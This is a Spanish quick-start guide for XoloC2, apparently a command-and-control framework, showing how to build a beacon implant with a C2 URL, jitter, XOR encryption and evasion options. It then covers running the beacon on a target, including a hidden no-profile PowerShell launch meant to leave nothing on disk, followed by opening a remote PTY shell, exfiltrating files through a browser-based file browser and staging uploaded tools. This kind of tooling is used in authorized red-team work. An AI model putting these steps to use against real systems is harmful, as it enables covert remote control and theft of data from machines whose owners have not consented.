Tu Primer Beacon
Tu Primer Beacon
Sección titulada «Tu Primer Beacon»Paso 1 — Generar el beacon
Sección titulada «Paso 1 — Generar el beacon»En la barra lateral de XoloC2, haz clic en Generar Beacon.
Rellena el formulario:
- Tipo: Python (recomendado para la primera prueba)
- URL C2:
https://tu-servidor:8443 - Sleep:
5segundos - Jitter:
20% - Encriptación: XOR (por defecto)
- Opciones de evasión: deja los valores por defecto para la primera prueba
Haz clic en Descargar para obtener el archivo fuente .py, o Compilar para obtener un binario.
Paso 2 — Desplegar en el objetivo
Sección titulada «Paso 2 — Desplegar en el objetivo»Transfiere el beacon al objetivo y ejecútalo:
# Fuente Python (Linux)python3 beacon.py
# Binario compilado Linux./beacon
# Javajava -jar beacon.jar
# Binario Go (Windows)beacon.exe
# PowerShell (en memoria, sin escritura en disco)powershell -nop -w hidden -File beacon.ps1Paso 3 — Interactuar
Sección titulada «Paso 3 — Interactuar»En pocos segundos el beacon aparece en Sesiones. Haz clic en él para abrir el panel de sesión.
Prueba tu primer comando:
whoamiLa salida llega en tiempo real via WebSocket.
Paso 4 — Shell PTY (solo Linux)
Sección titulada «Paso 4 — Shell PTY (solo Linux)»Haz clic en Shell PTY para abrir una terminal interactiva completa en el navegador. PTY completo — Ctrl+C, autocompletado con Tab, vim, htop y programas interactivos funcionan.
Paso 5 — Navegar archivos
Sección titulada «Paso 5 — Navegar archivos»Haz clic en Navegador de Archivos para explorar el sistema de archivos del objetivo. Haz clic en cualquier archivo para exfiltrarlo directamente a tu navegador.
Paso 6 — Subir un archivo
Sección titulada «Paso 6 — Subir un archivo»Usa el botón Subir para preparar un archivo en el servidor, luego envía:
__upload__ /tmp/herramientaEl beacon descarga y escribe el archivo en su próximo check-in.